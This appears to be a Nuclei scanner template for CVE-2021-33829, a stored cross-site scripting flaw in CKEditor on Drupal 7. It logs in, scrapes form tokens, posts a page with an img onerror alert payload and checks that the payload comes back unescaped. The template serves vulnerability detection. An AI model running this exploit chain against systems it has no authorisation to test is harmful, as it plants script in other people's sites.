id: CVE-2021-33829

info:
  name: Drupal 7 CKEditor XSS
  author: 0x_Akoko
  severity: medium
  description: |
    CKEditor 4.14.0 through 4.16.x before 4.16.1 contains a reflected cross-site scripting caused by mishandling in comments, letting remote attackers inject executable JavaScript code, exploit requires victim to view malicious content.
  impact: |
    Attackers can execute arbitrary JavaScript in the context of the victim's browser, leading to session hijacking or malicious actions.
  remediation: |
    Update to version 4.16.1 or later.
  reference:
    - https://checkmarx.com/blog/cve-2021-33829-stored-xss-vulnerability-discovered-in-ckeditor4-affects-widely-used-cms/
    - https://www.drupal.org/sa-core-2021-003
    - https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-33829
    cwe-id: CWE-79
    epss-score: 0.65532
    epss-percentile: 0.9851
    cpe: cpe:2.3:a:ckeditor:ckeditor:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    shodan-query: cpe:"cpe:2.3:a:ckeditor:ckeditor"
  tags: cve,cve2021,drupal,ckeditor,xss,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_id=user_login&op=Log+in

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(tolower(all_headers), "set-cookie")'
        condition: and
        internal: true

    extractors:
      - type: kval
        kval:
          - set_cookie
        internal: true

  - raw:
      - |
        GET /node/add/page HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "form_build_id")'
          - 'contains(body, "form_token")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_build_id
        part: body
        regex:
          - 'name="form_build_id" value="([^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: form_token
        part: body
        regex:
          - 'name="form_token" value="([^"]+)"'
        group: 1
        internal: true

  - raw:
      - |
        POST /node/add/page HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        title=XSSTest&body[und][0][value]=<!--{cke_protected}--><img src=x onerror=alert(document.domain)>&body[und][0][format]=full_html&changed=&form_build_id={{form_build_id}}&form_token={{form_token}}&form_id=page_node_form&status=1&comment=1&name={{username}}&op=Save

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_all(tolower(header), "location: ","/node/")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: node_url
        part: header
        regex:
          - 'Location: (.*/node/[0-9]+)'
        group: 1
        internal: true

  - raw:
      - |
        GET {{node_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '<!--{cke_protected}-->'
          - 'alert(document.domain)'
        condition: and

    extractors:
      - type: kval
        name: node_url
        kval:
          - node_url
# digest: 4a0a0047304502210085b606002fc5daf20c545549620105a4c4f86916addb0ba34b60e9a0a4a55b7c022025f994c8d385dcb398a46e0ecb5434f45be4de4f693f6fe232512ae8243c7be5:922c64590222798bb761d5b6d8e72950